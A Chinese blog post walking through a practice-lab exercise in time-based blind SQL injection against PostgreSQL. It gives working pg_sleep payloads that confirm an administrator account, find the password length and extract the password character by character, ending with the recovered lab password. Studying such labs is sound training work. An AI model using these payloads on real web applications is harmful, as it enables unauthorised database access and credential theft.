sql注入靶场案例报错型注入—时间型盲注

最新推荐文章于 2024-06-10 22:36:47 发布
最新推荐文章于 2024-06-10 22:36:47 发布
阅读量169 收藏 3
点赞数 2
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50822277/article/details/138417075
版权

大家可能会有一个问题,如果应用程序捕获了这个报错并正常处理了呢,这该怎么处理,这样的情况下服务器的响应和正常的报错不会有任何区别,那我们就没办法了吗?

那我们就可以使用 如 sleep() 这样的函数,去让SQL语句执行的时间变长,从而导致服务器响应的时间会与正常请求有明显的差异,这也就成为了我们用来判断是否存在注入点的条件。

正文开始

1、老样子,同样是在注入点开始尝试 单引号测试,后台对报错进行了处理,响应并没有任何区别
2、那就试试延时注入,由于我们并不知道后台使用的是什么数据库,所以我们就都试一下,由于需要使用 分号 闭合原有语句,所以我们需要用到 “%3B” 代替 “;”
在这里插入图片描述
1、我们可以判断出这是一个 PostgreSQL 数据库,

2、下面就让我们测试SQL语句吧,先测一下条件查询,payload '%3Bselect case when (1=1) then pg_sleep(5) else null end--+

3、下面加入表判断,payload '%3Bselect case when (username='administrator') then pg_sleep(10) else pg_sleep(0) end from users--+

结尾

可见是存在 users 这个表的,并且里面也确实有 administrator 这个用户,,那我们就需要看一下它的长度是多少了,测试长度为20,逐一尝试
payload '%3Bselect case when (username='administrator' and length(password) = 20) then pg_sleep(3) else pg_sleep(0) end from users--+

知道密码是 20 位之后,就可以开始爆破密码了,
payload '%3Bselect case when (username='administrator' and substring(password,1,1)='1') then pg_sleep(3) else pg_sleep(0) end from users--+,由于 intruder 的配置问题这里唯一不同的是需要在 Attack 中打开 columns 的 ‘Response received’ 选项,来查看他们的延迟时间

密码 ‘f6vrn5gyoqed1v9k9fm9’

晚来的棠棠
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
SQL注入之基于布尔的详解
09-10
首先说明的注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入一般分为布尔和基于时间。这篇文章主要讲解的是基于布尔的。下面来一起看看吧。
sql注入 自学笔记 注入 二阶注入 布尔时间 基于sqli-labs
02-19
sql注入 自学笔记 注入 二阶注入 布尔时间 基于sqli-labs
PHP、Apache环境中部署sqli-labs(SQL注入靶场
01-08
PHP、Apache环境中部署sqli-labs(SQL注入靶场
sql注入靶场.zip
06-24
sqli-labs-master,在github下载不了的可以在这下载
超级SQL注入工具,支持布尔,union注入
03-27
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,相比C#自带的HttpWebRequest速度提升2-5倍。 超级SQL注入工具支持环境获取世界各国语言数据,解决了各种常见注入工具在环境下无法支持中文等多字节编码的数据。 工具特点: 1.支持任意地点出现的任意SQL注入 2.支持各种语言环境。大多数注入工具在下,无法获取中文等多字节编码字符内容,本工具可完美解决。 3.支持注入数据发包记录。让你了解程序是如何注入,有助于快速学习和找出注入问题。 4.依靠关键字进行,可通过HTTP相应状态码判断,还可以通过关键字取反功能,反过来取关键字。
SQL注入(延时注入)---zkaq
weixin_38237216的博客
04-11 4744
1.概念 1.延时注入:当进行的时候,无论输入什么payload都会返回正常的处理信息,无法根据正确与误的payload得到信息。这个时候就需要使用特定的时间函数,通过查看web页面的返回时间差来判断 2.常用函数 sleep() :将程序挂起一段时间n为n秒 if(expr1,expr2,expr3) :判断语句;如果第一个语句正确就执行第二个语句如果误执行第三个语句 2.靶场 1.pass-13—延时注入(一) 通过题目中的sql语句可知,入参是用"闭合的,使用" and 1=1 – q
sql注入靶场案例-不回显
qq_50822277的博客
05-03 6
不知道各位有没有遇到过这样的功能,一个请求发送了好几个参数,但是不管你如何修改参数的值,他返回的都是一样的结果,而不会返回你构造的比如union的查询结果,这种时候该怎么办呢?我们可以想办法让它的SQL语句,看看响应会不会有差异,但是只是这样似乎不能证明这里执行了你的 payload 啊,比如一个要求是整形的参数,你改了一个字符串 ‘x’,这它不是应该的吗。所以我们需要让它是在语法正确的情况下,比如满足1=1的时候,不满足的时候不,这就需要用到我们下面的这个函数了。
sql注入详解
热门推荐
good good study
05-05 19万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
SQL注入03】注入实例操作
Fighting_hawk的博客
02-18 3499
1. SQL注入优先级:union注入>注入>布尔>延迟注入; 2. 了解注入常用的几个命令; 3. 掌握使用updataxml()函数进行注入; 4. updataxml()对仅能获取返回32位字符,对于长字符串需要分批次获取。...
SQL注入手动案例
05-30
SQL注入手动案例
13-sql注入查询方式及
qq_56414082的博客
03-29 547
当进行SQL注入时,有很多注入会出现无回显的情况,其中不回显的原因可能是SQL语句查询方式的问题导致,这个时候我们需要用到相关的进行后续操作,同时作为手工注入时,提前了解或预知其SQL语句大概写法也能更好的选择对应的注入语句。Access暴力猜解不出的问题?
SQL注入-04】注入案例
m0_64378913的博客
04-26 1463
目录1 注入概述2 常用的注入命令2.2 group by重复键冲突(count()+floor()+rand()+group by组合)2.2.1 group by重复键冲突的原理及bug演示2.2.2 补充:sql语句解析过程2.3 XPATH2.3.1 extractvalue()函数2.3.2 updatexml()函数2.4 测试失败的命令3 注入案例3.1 操作环境3.2 获取敏感信息3.2.1 获取数据库名3.2.2 获取表名3.2.3 获取字段名3.2.4 获取字段内
SQL注入-05】布尔案例
m0_64378913的博客
04-26 1694
目录1 概述2 操作环境3 操作具体步骤3.1 判断是否存在注入点及注入的类3.2 测试数据库库名长度3.3 逐个测试数据库库名的字符3.4 测试该数据库中所有表名3.5 测试users表中的所有字段名3.6 测试敏感字段的字段内容4 总结参考文章 1 概述 当改变浏览器传给后台SQL的参数后,浏览器没有显示对应内容也没有显示信息时,无法使用union联合查询注入注入,这时候可以试试看能否使用布尔注入。具体参考《【SQL注入-02】SQL注入点的简单判断》。 布尔:一般情况下,当带入参数为真
Web安全:SQL注入时间原理+步骤+实战操作
wangyuxiang946的博客
05-21 1989
这篇文章为大家解析时间的实现原理,结合实战案例讲解时间的操作步骤以及时间误差的判断
SQL注入-06】延时注入案例
m0_64378913的博客
04-26 2532
1 概述 当改变浏览器传给后台SQL的参数后, 浏览器没有显示对应内容也没有显示信息时,无法使用union联合查询注入注入;同时,输入参数为真或假也无法从页面显示上查出差异,无法使用布尔注入 ,这时候可以试试看能否使用延时注入。 延时:也称延时注入时间注入等,这种注入方式在传给后台的参数中,设置了一个if语句,当条件为真时执行sleep语句,条件为假时无执行语句,然后根据浏览器的响应时间来推测sleep语句是否被执行,进而推测if条件是否为真。 延时与布尔的核心思想都是通过浏览器两种
SQL 说“不”~
EasyOps_DevOps的博客
06-04 515
此外,redis 支持密钥的过期,包括记录的时间或使用。Redis 拥有广泛的生态系统,因为主要科技巨头都采用它,它是由 Salvatore Sanfilippo 开发的开源项目。Redis 使用单线程事件驱动架构,当 100 个用户读取数据库时,Redis 的响应时间SQL 数据库快 1000 倍。问题 - 为什么我们应该使用像 Redis 这样的东西,我们可以简单地将值存储在Map与其对应的键的数据结构中,并用它来处理并发请求?这种内存数据存储的局限性在于,它的成本会大幅增加。
PostgreSQL的视图pg_roles
最新发布
lee_vincent1的博客
06-10 398
pg_roles是 PostgreSQL 中的一个系统视图,提供了关于数据库角色(用户和组)的信息。PostgreSQL 中的角色用于管理数据库的权限、登录能力以及其他安全相关的特性。通过查询pg_roles视图,数据库管理员可以了解和管理数据库中所有角色的详细信息。pg_roles。
pikachu靶场sql注入
09-02
对于Pikachu靶场SQL注入问题,可以尝试以下步骤进行排查和解决: 1. 检查注入点:首先确认注入点在哪里,可以通过浏览器开发者工具查看请求,找到可能存在注入的参数或者输入框。 2. 过滤特殊字符:确保用户...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

晚来的棠棠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值